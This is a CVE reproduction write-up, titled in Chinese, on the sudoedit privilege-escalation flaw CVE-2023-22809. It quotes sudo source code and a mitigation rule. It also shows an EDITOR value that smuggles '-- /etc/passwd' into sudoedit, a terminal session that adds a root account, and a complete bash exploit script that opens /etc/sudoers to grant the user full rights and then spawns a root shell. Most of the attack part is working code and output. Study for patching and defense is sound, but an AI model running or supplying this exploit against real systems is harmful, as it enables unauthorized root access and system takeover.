【CVE复现】Linux Sudo权限提升漏洞(CVE-2023-22809)

// plugins/sudoers/sudoers.c@sudoers_policy_main()intsudoers_policy_main(int argc, char * const argv[], int pwflag, char *env_add[], bool verbose, void *closure){ // [...] validated = sudoers_lookup(snl, sudo_user.pw, &cmnd_status, pwflag); // [...] if (ISSET(sudo_mode, MODE_EDIT)) { // [...] safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc, &edit_argv, NULL,&env_editor, false);

// plugins/sudoers/editor.c@find_editor()char *find_editor(int nfiles, char **files, int *argc_out, char ***argv_out, char * const *allowlist, const char **env_editor, bool env_error){ // [...] *env_editor = NULL; ev[0] = "SUDO_EDITOR"; ev[1] = "VISUAL"; ev[2] = "EDITOR"; for (i = 0; i < nitems(ev); i++) { char *editor = getenv(ev[i]); if (editor != NULL && *editor != '') { *env_editor = editor; editor_path = resolve_editor(editor, strlen(editor), nfiles, files,argc_out, argv_out, allowlist);

// plugins/sudoers/editor.c@resolve_editor()static char *resolve_editor(const char *ed, size_t edlen, int nfiles, char **files, int *argc_out, char ***argv_out, char * const *allowlist){ // [...] /* * Split editor into an argument vector, including files to edit. * The EDITOR and VISUAL environment variables may contain command * line args so look for those and alloc space for them too. */ cp = wordsplit(ed, edend, &ep); // [...] editor = copy_arg(cp, ep – cp); /* Count rest of arguments and allocate editor argv. */ for (nargc = 1, tmp = ep; wordsplit(NULL, edend, &tmp) != NULL; ) nargc++; if (nfiles != 0) nargc += nfiles + 1; nargv = reallocarray(NULL, nargc + 1, sizeof(char *)); // [...] /* Fill in editor argv (assumes files[] is NULL-terminated). */ nargv[0] = editor; // [...] for (nargc = 1; (cp = wordsplit(NULL, edend, &ep)) != NULL; nargc++) { /* Copy string, collapsing chars escaped with a backslash. */ nargv[nargc] = copy_arg(cp, ep - cp); // [...] } if (nfiles != 0) { nargv[nargc++] = "--"; while (nfiles--) nargv[nargc++] = *files++; } nargv[nargc] = NULL; *argc_out = nargc; *argv_out = nargv;

// src/sudo_edit.c@sudo_edit()intsudo_edit(struct command_details *command_details){ // [...] /* * Set real, effective and saved uids to root. * We will change the euid as needed below. */ setuid(ROOT_UID); // [...] /* Find a temporary directory writable by the user. */ set_tmpdir(&user_details.cred); // [...] /* * The user's editor must be separated from the files to be * edited by a "--" option. */ for (ap = command_details->argv; *ap != NULL; ap++) { if (files) nfiles++; else if (strcmp(*ap, "--") == 0) files = ap + 1; else editor_argc++;

EDITOR='vim -- /path/to/extra/file'

vim -- /path/to/extra/file -- /path/from/policy

$ cat /etc/sudoersuser ALL=(ALL:ALL) sudoedit /etc/custom/service.conf[...]$ EDITOR='vim -- /etc/passwd' sudoedit /etc/custom/service.confsudoedit: --: editing files in a writable directory is not permitted2 files to editsudoedit: /etc/custom/service.conf unchanged$ tail -1 /etc/passwdsudoedit::0:0:root:/root:/bin/bash

#!/usr/bin/env bash## Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation# # Exploit Author: n3m1.sys# CVE: CVE-2023-22809# Date: 2023/01/21# Vendor Homepage: https://www.sudo.ws/# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz# Version: 1.8.0 to 1.9.12p1# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9## Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine.## The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the# attacker to add a line to gain privileges on all the files and get a root # shell.

if ! sudo --version | head -1 | grep -qE '(1.8.*|1.9.[0-9]1?(p[1-3])?|1.9.12p1)$'then    echo "> Currently installed sudo version is not vulnerable"    exit 1fi

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '(root)|(ALL)|(ALL : ALL)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then    echo "> It doesn't seem that this user can run sudoedit as root"    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2else    echo "> BINGO! User exploitable"fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"echo "$USER ALL=(ALL:ALL) ALL"read -n 1 -s -r -p "Press any key to continue..."EDITOR="vim -- /etc/sudoers" $EXPLOITABLEsudo su rootexit 0

Defaults!SUDOEDIT env_delete+="SUDO_EDITOR VISUAL EDITOR"Cmnd_Alias SUDOEDIT = sudoedit /etc/custom/service.confuser ALL=(ALL:ALL) SUDOEDIT